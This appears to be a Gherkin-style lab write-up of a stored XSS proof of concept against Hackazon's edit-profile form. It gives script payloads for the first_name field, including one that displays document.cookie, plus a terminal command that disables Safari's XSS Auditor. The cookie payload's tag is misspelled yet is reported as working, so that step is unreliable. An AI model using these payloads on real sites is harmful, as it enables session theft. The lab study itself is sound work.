# language: en

Feature: Cross-Site Scripting - Stored
  From the Hackazon system
  Of the category A7: Cross-Site Scripting
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /account/profile/edit
    Message: Edit Profile
    Details:
      - The form to edit some information of the profile
      - A Button to save and another one to save and exit
    Objective: Make an XSS Stored POC
    """

  Scenario: Store a JS instruction in the DB
    Given I previously know that there's a vulnerability in the first_name field
    When I do a simple XSS submitting in the field a script to show the number 1
    """
    Input:  first_name=<script>alert(1)</script>
    Output: # Nothing happens but the script is stored in the DB
    """
    Then it doesn't have any effect as a result
    But when I look at the Web Inspector shows me
    """
    The XSS Auditor refused to execute a script in '/account#profile' because
    its source code was found within the request. The auditor was enabled
    because the server did not send an 'X-XSS-Protection' header.
    """
    Then I turn off the Safari XSS Auditor from the terminal
    """
    defaults write com.apple.Safari \
    "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" \
    -bool FALSE
    """
    Given I reload the page it pop up the number 1 on screen
    When I change the value of alert to 'document.cookie' another common XSS
    """
    Input:  first_name=<scirpt>alert(document.cookie)</script>
    Output: PHPSESSID=hmf499cbdfotnu34k2lanld4e1
    """
    Then shows me the only cookie enabled by default every time it's reloaded
